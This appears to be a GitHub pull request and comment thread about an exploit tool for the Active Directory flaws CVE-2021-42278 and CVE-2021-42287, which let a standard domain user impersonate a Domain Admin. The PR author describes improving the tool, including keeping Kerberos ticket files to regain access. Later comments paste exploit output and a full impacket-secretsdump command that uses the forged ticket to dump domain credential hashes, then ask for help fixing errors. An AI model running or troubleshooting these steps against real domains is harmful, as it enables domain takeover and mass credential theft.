Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Hi @WazeHell. Great work on this, tried in an engagement worked like a charm. I just changed a few things to make it a bit more flexible, such as:

• The .ccache files should not be removed at the end of the scripts, as they can be REUSED to regain access to the target host.
• If the domain hosts more than 1 DC, the original script will always take the first one (get_dc_host). However, sometimes the first DC may not be the target and may not even be vulnerable (As reported in #1). The new logic will fix #1, and attack the target specified in the parameter dc-host, if it's a DC. If the target is not a DC, the script will fallback to the first DC in the domain.
• I've also noticed you were trying to perform some validation on the account provided in the script, but you never used the parsed information anywhere, so I've introduced the logic to fix the account whenever the domain or the password are missing.

I've tested the new script and works quite well, but please get in touch if you need me to address anything else before merging.

1. when i get this message, what can i do with this ccache file ? can i transfer this ccache file to another system and use with mimikatz? [*] Impersonating test.misah [*] Requesting S4U2self [*] Saving ticket in test.misah.ccache

2. when i get this message from exploit [*] You can deploy a shell when you want using the following command: [$] KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'labdc01.lab.local' and run this command, i get error 2.1. first error [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user [*] Cleaning up...

2.2. after i add -just-dc-user, i have another error [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified) [*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter [*] Cleaning up...

2.3. after i add -use-vss i still get new error [-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

HOWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW TO FIX help me please, thank you!

Hi WazeHell, great job. Can it be also done on windows server 2003 domain? I only got error

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] WARNING: Target host is not a DC [*] Selected Target server2003.domainname.local list index out of range root@vs27:~/sam-the-admin-main#